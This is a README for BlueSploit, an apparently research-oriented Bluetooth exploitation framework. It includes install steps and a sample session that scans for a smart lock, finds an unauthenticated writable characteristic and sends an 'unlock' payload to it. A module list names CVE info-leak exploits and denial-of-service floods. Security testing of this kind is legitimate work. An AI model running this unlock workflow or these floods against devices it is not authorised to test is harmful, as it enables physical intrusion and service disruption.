Bluetooth Exploitation Framework
A Metasploit-style modular framework for Bluetooth Classic and BLE security testing.
I started building this with a purpose. Since itβs an early version, there may be stability issues and false positives. Iβm still working on it, so please be patient.
- π Device Discovery - Scan for nearby BLE and Classic Bluetooth devices
- π GATT Enumeration - Enumerate services, characteristics, and descriptors
- π Exploit Modules - Ready-to-use exploits for common vulnerabilities
- π Credential Testing - Test for default/weak PINs and pairing vulnerabilities
- π Modular Architecture - Easy to extend with custom modules
- πΎ Result Export - Save scan results and loot to JSON
# Clone the repository
git clone https://github.com/v33ru/bluesploit.git
cd bluesploit
#create python virtual environment
python3 -m venv env
source env/bin/activate
# Install dependencies
pip install -r requirements.txt
# Run BlueSploit
python bluesploit.py
- Python 3.10+
- Bluetooth adapter (built-in or USB dongle)
- Linux:
bluezstack installed - macOS: Works out of the box
- Windows: Requires Windows 10+ with BLE support
$ python bluesploit.py
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β β
β βββββββ βββ βββ ββββββββββββββββββββββββββ βββ βββββββ ββββββββββββ β
β βββββββββββ βββ ββββββββββββββββββββββββββββββ βββββββββββββββββββββ β
β βββββββββββ βββ βββββββββ βββββββββββββββββββ βββ ββββββ βββ β
β βββββββββββ βββ βββββββββ βββββββββββββββ βββ βββ ββββββ βββ β
β ββββββββββββββββββββββββββββββββββββββββββββ ββββββββββββββββββββ βββ β
β βββββββ ββββββββ βββββββ βββββββββββββββββββ ββββββββ βββββββ βββ βββ β
β β
β ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ£
β β
β Bluetooth Exploitation Framework v1.0.0 β
β βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ β
β β
β β Author : v33ru / Mr-IoT β
β β Community : IoT Security Research Group (IOTSRG) β
β β GitHub : https://github.com/v33ru β
β β
β ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ£
β β
β [+] BLE Scanning & Enumeration [+] GATT Service Analysis β
β [+] Bluetooth Classic Attacks [+] Vulnerability Detection β
β [+] Exploitation Modules [+] Protocol Reverse Engineering β
β β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β Type 'help' for commands Type 'show modules' to list modules β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
bluesploit > help
Core Commands
=============
use <module> Load a module
back Unload current module
search <keyword> Search for modules
show <type> Show modules/options
Module Commands
===============
set <opt> <val> Set module option
unset <option> Clear module option
options Show module options
info Show module info
run / exploit Execute module
check Check if vulnerable
Utility Commands
================
clear Clear screen
reload Reload modules
setg <opt> <val> Set global option
banner Show banner
exit / quit Exit BlueSploit
bluesploit > use scanners/ble/discovery
bluesploit (scanners/ble/discovery) > set timeout 15
bluesploit (scanners/ble/discovery) > run
[*] Scanning for BLE devices (15s)...
[+] AA:BB:CC:DD:EE:FF - Smart Lock [-45 dBm] [Nordic Semiconductor]
[+] 11:22:33:44:55:66 - MI Band 7 [-62 dBm] [Xiaomi]
[+] Found 2 devices
bluesploit > use scanners/ble/gatt_enum
bluesploit (scanners/ble/gatt_enum) > set target AA:BB:CC:DD:EE:FF
bluesploit (scanners/ble/gatt_enum) > run
[+] Connected to AA:BB:CC:DD:EE:FF
[*] Enumerating GATT services...
[Service] 00001800-0000-1000-8000-00805f9b34fb
Generic Access (Handle: 0x0001)
βββ [Char] 00002a00-0000-1000-8000-00805f9b34fb
β Device Name
β Properties: read
β Value: Smart Lock
[Service] 0000fee0-0000-1000-8000-00805f9b34fb
Custom Service (Handle: 0x0010)
βββ [Char] 0000fee1-0000-1000-8000-00805f9b34fb β VULN
β Properties: write-without-response, notify
β β UNAUTH_WRITE_POSSIBLE: Write-without-response enabled
bluesploit > use exploits/ble/unauth_write
bluesploit (exploits/ble/unauth_write) > set target AA:BB:CC:DD:EE:FF
bluesploit (exploits/ble/unauth_write) > set char_uuid 0000fee1-0000-1000-8000-00805f9b34fb
bluesploit (exploits/ble/unauth_write) > set payload 0601 # Unlock command
bluesploit (exploits/ble/unauth_write) > check
[*] Checking AA:BB:CC:DD:EE:FF for vulnerability...
[+] Found characteristic: 0000fee1-0000-1000-8000-00805f9b34fb
[+] VULNERABLE: Write-without-response enabled!
bluesploit (exploits/ble/unauth_write) > run
[+] Connected to AA:BB:CC:DD:EE:FF
[+] Payload delivered!
modules/
βββ scanners/ # Discovery & enumeration
β βββ ble/
β β βββ discovery.py # BLE device discovery
β β βββ gatt_enum.py # GATT service + characteristic enumeration
β βββ classic/
β βββ sdp_enum.py # Classic SDP service discovery
β
βββ exploits/ # Exploits + attack modules
β βββ ble/
β β βββ unauth_write.py # BLE unauthenticated GATT write
β β
β βββ classic/
β β βββ blueborne_leak.py # CVE-2017-0781 info leak
β β βββ bnep_heap_disclosure.py# CVE-2017-13258 heap disclosure
β β
β βββ dos/
β βββ ble/
β β βββ notify_flood.py # BLE notification / GATT flood
β βββ classic/
β βββ l2ping_dos.py # L2CAP ping flood
β βββ bluesmack.py # L2CAP echo flood (large packets)
β βββ sdp_flood.py # SDP query flood
β βββ rfcomm_flood.py # RFCOMM connection exhaustion
Contributions are welcome! Please feel free to submit a Pull Request.
- Fork the repository
- Create your feature branch (
git checkout -b feature/new-module) - Commit your changes (
git commit -am 'Add new module') - Push to the branch (
git push origin feature/new-module) - Open a Pull Request
- Bluetooth Classic support (BR/EDR)
- PIN bruteforce module
- BTSnoop log analyzer (GhostWrite integration)
- Replay attack module
- Database for session/loot storage
- Ubertooth integration
- BTLEJuice integration
- Inspired by RouterSploit and Metasploit
- Built with Bleak for cross-platform BLE support
- Thanks to the Bluetooth security research community